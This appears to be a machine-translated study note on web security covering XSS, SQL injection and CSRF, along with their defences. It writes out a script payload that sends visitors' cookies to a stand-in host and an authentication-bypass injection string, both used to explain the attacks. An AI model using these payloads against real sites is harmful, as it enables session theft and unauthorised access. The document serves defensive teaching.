Foreword
I had a reading notes before this chicken dish, arrange a "large-scale Web Site Technology Framework," a book five architectural elements described Zhihui teacher's book. These five factors are performance, availability, flexibility, scalability, security . In this paper, security simple discussion of the elements of the content is the main reference from "large-scale Web Site Technology Framework" This book (a very recommend this book, personally think that this book can be said to exist as the introduction of technology architecture ).
The so-called security means, requires the system in responding to a variety of attacks to have a reliable response.
This paper comb several common attack techniques, as well as the corresponding means of defense.
Cross-site scripting attacks (XSS)
XSS (Cross-Site Scripting, XSS) , you can code will be injected into the pages viewed on such code include HTML and JavaScript
I. Attacks
For example there is a forum site, the attacker can publish the following in the above:
<script>location.href="//domain.com/?c=" + document.cookie</script>
After the content may be rendered into the following form:
<p><script>location.href="//domain.com/?c=" + document.cookie</script></p>
Another user browses pages with this content will jump to domain.com and carry the current scope of Cookie. If the Forum website by Cookie Manager user logged in, the attacker can log in through this Cookie is the attacker's account.
Second, the harm
- Steal the user's Cookie
- Forged false personal information input form to cheat
Third, the means of defense
1. Disinfection
XSS attacks are generally fitted by a malicious script object in the request such an attack, these scripts are generally not used for user input, if the filtration and disinfection, i.e. certain html escape dangerous characters, for example ' < 'escapes' & lt' ;, the '>' escapes' & gt '. HTML and Javascript code to avoid the operation.
Disinfection almost all sites necessary anti-XSS attacks.
2 . HttpOnly
Setting the HttpOnly of Cookie can prevent JavaScript script calls , you can not get the user Cookie information document.cookie.
SQL injection attacks
Malicious attacker injects SQL commands in the HTTP request, the server is configured with a request parameter database SQL command, SQL malicious configured together and executed in the database.
I. Attacks
For example, a website login authentication SQL query code is:
sql = "SELECT * FROM users WHERE (name = '" + userName + "') and (pw = '"+ passWord +"');"
If you fill in the following:
userName = "1' OR '1'='1";
passWord = "1' OR '1'='1";
Then the SQL query string:
sql = "SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw = '1' OR '1'='1');"
At this point you can execute the following query without authentication by:
sql = "SELECT * FROM users;"
Second, the means of defense
1. Disinfection
And anti-XSS attacks, request parameters disinfection is a relatively simple and crude but effective means. By matching the timing, the filter may request data to the SQL injection, such as "drop table" and the like.
2. Parameter binding
In Java PreparedStatement is precompiled SQL statements, you can pass the proper parameters and multiple executions. Since there is no stitching process, it is possible to prevent SQL injection occurs.
PreparedStatement ps = connection.prepareStatement("SELECT * FROM users WHERE userid=? AND password=?");
ps.setString(1, userid);
ps.setString(2, password);
ResultSet rs = ps.executeQuery();
Cross-site request forgery (CSRF)
CSRF (Cross-site request forgery, CSRF), the attacker through some technical means to deceive the user's browser to access a website they have certified and perform some action (such as e-mail, messaging, and even property operations such as transfers and purchases). Because the browser has been certified, so the site is accessed think is the real user to perform operations away.
XSS exploit the trust a user has designated the site, CSRF exploit the trust a Web site user's browser.
Means of defense
1. Form Token
The server generates a random number in the form and attach, and requires the client to return the random number.
2. Enter PIN
Because CSRF attack occurs when the user unconscious, it requires users to enter a verification code that allows users to know that they are doing the operation.
3. Check the Referer header field
Referer header field is located in the HTTP packet, an address identifying the source of the request. Check this header fields and address the requirements of the source of the request under the same domain name, it can greatly prevent CSRF attacks.
This approach is simple, low workload, only need to increase access to critical step verification in place. But this approach has its limitations, because of its totally dependent on the browser sends the correct Referer field. Although the HTTP protocol this content fields are clearly defined, but does not guarantee the realization of the visiting browser, the browser also can not guarantee that no security vulnerabilities affecting this field. And there may be some browsers attackers, tamper with their Referer field.